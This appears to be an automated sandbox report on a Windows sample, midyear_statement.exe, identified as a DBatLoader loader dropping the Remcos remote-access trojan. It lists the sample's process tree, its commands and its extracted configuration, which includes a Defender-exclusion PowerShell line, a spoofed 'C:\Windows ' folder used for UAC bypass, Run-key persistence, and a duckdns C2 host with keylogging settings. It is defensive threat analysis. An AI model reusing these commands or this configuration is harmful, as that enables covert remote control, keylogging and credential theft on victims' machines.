Windows Analysis Report
midyear_statement.exe

Overview

General Information

Sample name:midyear_statement.exe
Analysis ID:1417015
MD5:dd8e3f6ac5c24960b3a69490082c60e1
SHA1:c5f8aaec5baa571791789dd5fac53e27938dbc29
SHA256:15db18392d7bbf15b30e528db05ec306e00ac3227277d0639064ec3e2bc98c73
Tags:exe

Detection

Remcos, DBatLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Contains functionality to bypass UAC (CMSTPLUA)
Detected Remcos RAT
Detected unpacking (changes PE section rights)
Detected unpacking (creates a PE file in dynamic memory)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Remcos
Sigma detected: TrustedPath UAC Bypass Pattern
Snort IDS alert for network traffic
Yara detected DBatLoader
Yara detected Remcos RAT
Yara detected UAC Bypass using CMSTP
Adds a directory exclusion to Windows Defender
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Contains functionality to inject code into remote processes
Contains functionality to register a low level keyboard hook
Contains functionality to steal Chrome passwords or cookies
Contains functionality to steal Firefox passwords or cookies
Contains functionality to change the wallpaper
Delayed program exit found
Drops PE files with a suspicious file extension
Drops executables to the windows directory (C:\Windows) and starts them
Installs a global keyboard hook
Maps a DLL or memory area into another process
Sigma detected: DLL Search Order Hijackig Via Additional Space in Path
Sigma detected: Execution from Suspicious Folder
Sigma detected: New RUN Key Pointing to Suspicious Folder
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Suspicious Program Location with Network Connections
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Instant Messenger accounts or passwords
Tries to steal Mail credentials (via file / registry access)
Tries to steal Mail credentials (via file registry)
Uses dynamic DNS services
Writes to foreign memory regions
Yara detected WebBrowserPassView password recovery tool
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Binary contains a suspicious time stamp
Contains capabilities to detect virtual machines
Contains functionality for read data from the clipboard
Contains functionality to call native functions
Contains functionality to check if a connection to the internet is available
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to enumerate running services
Contains functionality to launch a control a shell (cmd.exe)
Contains functionality to launch a process as a different user
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Deletes files inside the Windows folder
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Execution of Suspicious File Type Extension
Sigma detected: Powershell Defender Exclusion
Sigma detected: Uncommon Svchost Parent Process
Tries to load missing DLLs
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • midyear_statement.exe (PID: 6428 cmdline: "C:\Users\user\Desktop\midyear_statement.exe" MD5: DD8E3F6AC5C24960B3A69490082C60E1)
    • cmd.exe (PID: 3632 cmdline: cmd /c mkdir "\\?\C:\Windows " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 7132 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 700 cmdline: cmd /c mkdir "\\?\C:\Windows \System32" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 5900 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • svchost.exe (PID: 3632 cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
    • cmd.exe (PID: 7520 cmdline: cmd /c "C:\Windows \System32\2506803.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 7528 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • 2506803.exe (PID: 7572 cmdline: "C:\Windows \System32\2506803.exe" MD5: 231CE1E1D7D98B44371FFFF407D68B59)
        • cmd.exe (PID: 7588 cmdline: C:\Windows\system32\cmd.exe /c ""C:\windows \system32\KDECO.bat"" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • conhost.exe (PID: 7596 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 7640 cmdline: cmd /c powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath 'C:\Users'" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 7648 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • powershell.exe (PID: 7692 cmdline: powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath 'C:\Users'" MD5: 04029E121A0CFA5991749937DD22A1D9)
              • WmiPrvSE.exe (PID: 8068 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • extrac32.exe (PID: 7876 cmdline: C:\\Windows\\System32\\extrac32.exe /C /Y C:\Users\user\Desktop\midyear_statement.exe C:\\Users\\Public\\Libraries\\Dhuirrkw.PIF MD5: 9472AAB6390E4F1431BAA912FCFF9707)
    • wkrriuhD.pif (PID: 7896 cmdline: C:\Users\Public\Libraries\wkrriuhD.pif MD5: C116D3604CEAFE7057D77FF27552C215)
      • wkrriuhD.pif (PID: 8172 cmdline: C:\Users\Public\Libraries\wkrriuhD.pif /stext "C:\Users\user\AppData\Local\Temp\jshsresovzeecssjzbcdvgiytb" MD5: C116D3604CEAFE7057D77FF27552C215)
      • wkrriuhD.pif (PID: 8184 cmdline: C:\Users\Public\Libraries\wkrriuhD.pif /stext "C:\Users\user\AppData\Local\Temp\tumlrwcijhwjehgnqmoeyldobicnm" MD5: C116D3604CEAFE7057D77FF27552C215)
      • wkrriuhD.pif (PID: 1648 cmdline: C:\Users\Public\Libraries\wkrriuhD.pif /stext "C:\Users\user\AppData\Local\Temp\vozespnjxpoopncrzwbyjypxcpmofmxl" MD5: C116D3604CEAFE7057D77FF27552C215)
  • Dhuirrkw.PIF (PID: 7544 cmdline: "C:\Users\Public\Libraries\Dhuirrkw.PIF" MD5: DD8E3F6AC5C24960B3A69490082C60E1)
    • wkrriuhD.pif (PID: 7860 cmdline: C:\Users\Public\Libraries\wkrriuhD.pif MD5: C116D3604CEAFE7057D77FF27552C215)
  • Dhuirrkw.PIF (PID: 6044 cmdline: "C:\Users\Public\Libraries\Dhuirrkw.PIF" MD5: DD8E3F6AC5C24960B3A69490082C60E1)
    • wkrriuhD.pif (PID: 1652 cmdline: C:\Users\Public\Libraries\wkrriuhD.pif MD5: C116D3604CEAFE7057D77FF27552C215)
  • cleanup
Name: Remcos, RemcosRAT
Description: Remcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers. Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns. Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user. Remcos is developed by the cybersecurity company BreakingSecurity.
Attribution:
  • APT33
  • The Gorgon Group
  • UAC-0050
Blogpost URLs:
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos

Name: DBatLoader
Description: This Delphi loader misuses cloud storage services, such as Google Drive, to download the Delphi stager component. The Delphi stager has the actual payload embedded as a resource and starts it.
Attribution: No Attribution
Blogpost URLs:
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.dbatloader
{"Host:Port:Password": "xwww.zuckdgreb.duckdns.org:4445:0", "Assigned name": "vista", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-W5UGP5", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}
Yara matches in dropped files (Source; Rule; Description; Author):
  • C:\ProgramData\remcos\logs.dat; JoeSecurity_Remcos; Yara detected Remcos RAT; Joe Security

Yara matches in memory dumps (Source; Rule; Description; Author):
  • 00000000.00000003.1190782910.000000007FD60000.00000004.00001000.00020000.00000000.sdmp; JoeSecurity_DBatLoader; Yara detected DBatLoader; Joe Security
  • 00000018.00000002.3664888730.0000000013EEF000.00000004.00000010.00020000.00000000.sdmp; JoeSecurity_Remcos; Yara detected Remcos RAT; Joe Security
  • 00000000.00000002.1367518233.00000000040A1000.00000020.00001000.00020000.00000000.sdmp; JoeSecurity_DBatLoader; Yara detected DBatLoader; Joe Security
  • 00000018.00000003.1622995189.00000000124A0000.00000004.00000020.00020000.00000000.sdmp; JoeSecurity_Remcos; Yara detected Remcos RAT; Joe Security
  • 00000018.00000002.3664441036.0000000012330000.00000040.00001000.00020000.00000000.sdmp; JoeSecurity_Remcos; Yara detected Remcos RAT; Joe Security
  (49 entries in total; 5 shown)

Yara matches in unpacked PE files (Source; Rule; Description; Author; Strings):
  • 0.2.midyear_statement.exe.2656dc8.0.raw.unpack; JoeSecurity_DBatLoader; Yara detected DBatLoader; Joe Security
  • 0.2.midyear_statement.exe.2a46bd8.2.raw.unpack; JoeSecurity_DBatLoader; Yara detected DBatLoader; Joe Security
  • 24.2.wkrriuhD.pif.5919e2.1.raw.unpack; JoeSecurity_Remcos; Yara detected Remcos RAT; Joe Security
  • 24.2.wkrriuhD.pif.5919e2.1.raw.unpack; JoeSecurity_UACBypassusingCMSTP; Yara detected UAC Bypass using CMSTP; Joe Security
  • 24.2.wkrriuhD.pif.5919e2.1.raw.unpack; Windows_Trojan_Remcos_b296e965; unknown; unknown
    • 0x6aaa8:$a1: Remcos restarted by watchdog!
    • 0x6b020:$a3: %02i:%02i:%02i:%03i
  (90 entries in total; 5 shown)

System Summary

Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: "C:\Windows \System32\2506803.exe", CommandLine: "C:\Windows \System32\2506803.exe", CommandLine|base64offset|contains: , Image: C:\Windows \System32\2506803.exe, NewProcessName: C:\Windows \System32\2506803.exe, OriginalFileName: C:\Windows \System32\2506803.exe, ParentCommandLine: cmd /c "C:\Windows \System32\2506803.exe", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7520, ParentProcessName: cmd.exe, ProcessCommandLine: "C:\Windows \System32\2506803.exe", ProcessId: 7572, ProcessName: 2506803.exe
Source: File created; Author: frack113, Nasreddine Bencherchali; Data: EventID: 11, Image: C:\Users\user\Desktop\midyear_statement.exe, ProcessId: 6428, TargetFilename: C:\Windows \System32\netutils.dll
Source: Process started; Author: Florian Roth (Nextron Systems), Tim Shelton; Data: Command: C:\Users\Public\Libraries\wkrriuhD.pif, CommandLine: C:\Users\Public\Libraries\wkrriuhD.pif, CommandLine|base64offset|contains: , Image: C:\Users\Public\Libraries\wkrriuhD.pif, NewProcessName: C:\Users\Public\Libraries\wkrriuhD.pif, OriginalFileName: C:\Users\Public\Libraries\wkrriuhD.pif, ParentCommandLine: "C:\Users\user\Desktop\midyear_statement.exe", ParentImage: C:\Users\user\Desktop\midyear_statement.exe, ParentProcessId: 6428, ParentProcessName: midyear_statement.exe, ProcessCommandLine: C:\Users\Public\Libraries\wkrriuhD.pif, ProcessId: 7896, ProcessName: wkrriuhD.pif
Source: Registry Key set; Author: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing; Data: Details: C:\Users\Public\Dhuirrkw.url, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\midyear_statement.exe, ProcessId: 6428, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Dhuirrkw
Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: cmd /c powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath 'C:\Users'" , CommandLine: cmd /c powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath 'C:\Users'" , CommandLine|base64offset|contains: rg, Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\windows \system32\KDECO.bat"", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7588, ParentProcessName: cmd.exe, ProcessCommandLine: cmd /c powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath 'C:\Users'" , ProcessId: 7640, ProcessName: cmd.exe
Source: Network Connection; Author: Florian Roth (Nextron Systems), Tim Shelton; Data: DestinationIp: 192.3.109.132, DestinationIsIpv6: false, DestinationPort: 4445, EventID: 3, Image: C:\Users\Public\Libraries\wkrriuhD.pif, Initiated: true, ProcessId: 7896, Protocol: tcp, SourceIp: 192.168.2.7, SourceIsIpv6: false, SourcePort: 49708
Source: Registry Key set; Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split); Data: Details: C:\Users\Public\Dhuirrkw.url, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\midyear_statement.exe, ProcessId: 6428, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Dhuirrkw
Source: Process started; Author: Max Altgelt (Nextron Systems); Data: Command: C:\Users\Public\Libraries\wkrriuhD.pif, CommandLine: C:\Users\Public\Libraries\wkrriuhD.pif, CommandLine|base64offset|contains: , Image: C:\Users\Public\Libraries\wkrriuhD.pif, NewProcessName: C:\Users\Public\Libraries\wkrriuhD.pif, OriginalFileName: C:\Users\Public\Libraries\wkrriuhD.pif, ParentCommandLine: "C:\Users\user\Desktop\midyear_statement.exe", ParentImage: C:\Users\user\Desktop\midyear_statement.exe, ParentProcessId: 6428, ParentProcessName: midyear_statement.exe, ProcessCommandLine: C:\Users\Public\Libraries\wkrriuhD.pif, ProcessId: 7896, ProcessName: wkrriuhD.pif
Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: cmd /c powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath 'C:\Users'" , CommandLine: cmd /c powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath 'C:\Users'" , CommandLine|base64offset|contains: rg, Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\windows \system32\KDECO.bat"", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7588, ParentProcessName: cmd.exe, ProcessCommandLine: cmd /c powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath 'C:\Users'" , ProcessId: 7640, ProcessName: cmd.exe
Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc, CommandLine: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\midyear_statement.exe", ParentImage: C:\Users\user\Desktop\midyear_statement.exe, ParentProcessId: 6428, ParentProcessName: midyear_statement.exe, ProcessCommandLine: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc, ProcessId: 3632, ProcessName: svchost.exe
Source: Process started; Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements); Data: Command: powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath 'C:\Users'" , CommandLine: powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath 'C:\Users'" , CommandLine|base64offset|contains: )f, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: cmd /c powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath 'C:\Users'" , ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7640, ParentProcessName: cmd.exe, ProcessCommandLine: powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath 'C:\Users'" , ProcessId: 7692, ProcessName: powershell.exe
Source: Process started; Author: vburov; Data: Command: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc, CommandLine: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\midyear_statement.exe", ParentImage: C:\Users\user\Desktop\midyear_statement.exe, ParentProcessId: 6428, ParentProcessName: midyear_statement.exe, ProcessCommandLine: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc, ProcessId: 3632, ProcessName: svchost.exe

Stealing of Sensitive Information

Source: File created; Author: Joe Security; Data: EventID: 11, Image: C:\Users\Public\Libraries\wkrriuhD.pif, ProcessId: 7896, TargetFilename: C:\ProgramData\remcos\logs.dat

Snort IDS alerts:

Timestamp: 03/28/24-13:59:15.069542
SID: 2032776
Source Port: 49708
Destination Port: 4445
Protocol: TCP
Classtype: A Network Trojan was detected

Timestamp: 03/28/24-14:01:41.205303
SID: 2032777
Source Port: 4445
Destination Port: 49708
Protocol: TCP
Classtype: A Network Trojan was detected

AV Detection

Source: http://geoplugin.net/json.gp/C; URL Reputation: Label: phishing
Source: http://geoplugin.net/json.gp; URL Reputation: Label: phishing
Source: 00000018.00000002.3664577079.000000001245D000.00000004.00000020.00020000.00000000.sdmp; Malware Configuration Extractor: Remcos {"Host:Port:Password": "xwww.zuckdgreb.duckdns.org:4445:0", "Assigned name": "vista", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-W5UGP5", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}
Source: C:\Users\Public\Libraries\Dhuirrkw.PIF; ReversingLabs: Detection: 26%
Source: C:\Windows \System32\netutils.dll; ReversingLabs: Detection: 75%
Source: midyear_statement.exe; ReversingLabs: Detection: 26%
Source: midyear_statement.exe; Virustotal: Detection: 31%
Source: Yara match; File source: 24.2.wkrriuhD.pif.5919e2.1.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 33.2.wkrriuhD.pif.5919e2.1.unpack, type: UNPACKEDPE
Source: Yara match; File source: 31.2.wkrriuhD.pif.590000.1.unpack, type: UNPACKEDPE
Source: Yara match; File source: 24.2.wkrriuhD.pif.5919e2.1.unpack, type: UNPACKEDPE
Source: Yara match; File source: 33.2.wkrriuhD.pif.590000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 31.2.wkrriuhD.pif.5919e2.0.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 33.2.wkrriuhD.pif.590000.2.unpack, type: UNPACKEDPE
Source: Yara match; File source: 33.2.wkrriuhD.pif.5919e2.1.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 31.2.wkrriuhD.pif.24140000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 24.2.wkrriuhD.pif.12330000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 24.2.wkrriuhD.pif.12330000.2.unpack, type: UNPACKEDPE
Source: Yara match; File source: 31.2.wkrriuhD.pif.24140000.2.unpack, type: UNPACKEDPE
Source: Yara match; File source: 31.2.wkrriuhD.pif.5919e2.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 24.2.wkrriuhD.pif.590000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 31.2.wkrriuhD.pif.590000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 33.2.wkrriuhD.pif.4f0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 24.2.wkrriuhD.pif.590000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 33.2.wkrriuhD.pif.4f0000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 00000018.00000002.3664888730.0000000013EEF000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000018.00000003.1622995189.00000000124A0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000018.00000002.3664441036.0000000012330000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000021.00000002.1638276893.0000000000590000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 0000001F.00000002.1589395937.0000000024140000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000018.00000002.3664577079.000000001245D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000018.00000002.3646905411.0000000000590000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000018.00000002.3664577079.000000001248D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 0000001F.00000002.1589543498.000000002427B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000021.00000002.1638093919.00000000004F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000018.00000002.3664577079.00000000124A0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000021.00000002.1658571409.00000000244BA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 0000001F.00000002.1566851721.0000000000590000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: Process Memory Space: wkrriuhD.pif PID: 7896, type: MEMORYSTR
Source: Yara match; File source: Process Memory Space: wkrriuhD.pif PID: 7860, type: MEMORYSTR
Source: Yara match; File source: Process Memory Space: wkrriuhD.pif PID: 1652, type: MEMORYSTR
Source: Yara match; File source: C:\ProgramData\remcos\logs.dat, type: DROPPED
Source: C:\Users\Public\Libraries\wkrriuhD.pif; Code function: 24_2_12363837 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,24_2_12363837
Source: C:\Users\Public\Libraries\wkrriuhD.pif; Code function: 27_2_00404423 GetProcAddress,FreeLibrary,CryptUnprotectData,27_2_00404423
Source: wkrriuhD.pif; Binary or memory string: -----BEGIN PUBLIC KEY-----

Exploits

Source: Yara match; File source: 24.2.wkrriuhD.pif.5919e2.1.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 33.2.wkrriuhD.pif.5919e2.1.unpack, type: UNPACKEDPE
Source: Yara match; File source: 31.2.wkrriuhD.pif.590000.1.unpack, type: UNPACKEDPE
Source: Yara match; File source: 24.2.wkrriuhD.pif.5919e2.1.unpack, type: UNPACKEDPE
Source: Yara match; File source: 33.2.wkrriuhD.pif.590000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 31.2.wkrriuhD.pif.5919e2.0.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 33.2.wkrriuhD.pif.590000.2.unpack, type: UNPACKEDPE
Source: Yara match; File source: 33.2.wkrriuhD.pif.5919e2.1.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 31.2.wkrriuhD.pif.24140000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 24.2.wkrriuhD.pif.12330000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 24.2.wkrriuhD.pif.12330000.2.unpack, type: UNPACKEDPE
Source: Yara match; File source: 31.2.wkrriuhD.pif.24140000.2.unpack, type: UNPACKEDPE
Source: Yara match; File source: 31.2.wkrriuhD.pif.5919e2.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 24.2.wkrriuhD.pif.590000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 31.2.wkrriuhD.pif.590000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 33.2.wkrriuhD.pif.4f0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 24.2.wkrriuhD.pif.590000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 33.2.wkrriuhD.pif.4f0000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 00000018.00000002.3664441036.0000000012330000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000021.00000002.1638276893.0000000000590000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 0000001F.00000002.1589395937.0000000024140000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000018.00000002.3646905411.0000000000590000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000021.00000002.1638093919.00000000004F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 0000001F.00000002.1566851721.0000000000590000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: Process Memory Space: wkrriuhD.pif PID: 7896, type: MEMORYSTR
Source: Yara match; File source: Process Memory Space: wkrriuhD.pif PID: 7860, type: MEMORYSTR
Source: Yara match; File source: Process Memory Space: wkrriuhD.pif PID: 1652, type: MEMORYSTR

                      Privilege Escalation

                      barindex
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifCode function: 24_2_123374FD _wcslen,CoGetObject,24_2_123374FD

                      Compliance

                      barindex
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifUnpacked PE file: 24.2.wkrriuhD.pif.12330000.2.unpack
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifUnpacked PE file: 31.2.wkrriuhD.pif.24140000.2.unpack
                      Source: midyear_statement.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                      Source: unknownHTTPS traffic detected: 13.107.139.11:443 -> 192.168.2.7:49700 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 13.107.139.11:443 -> 192.168.2.7:49703 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 13.107.139.11:443 -> 192.168.2.7:49706 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 13.107.139.11:443 -> 192.168.2.7:49719 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 13.107.139.11:443 -> 192.168.2.7:49722 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 13.107.139.11:443 -> 192.168.2.7:49725 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 13.107.139.11:443 -> 192.168.2.7:49728 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 13.107.139.11:443 -> 192.168.2.7:49731 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 13.107.139.11:443 -> 192.168.2.7:49734 version: TLS 1.2
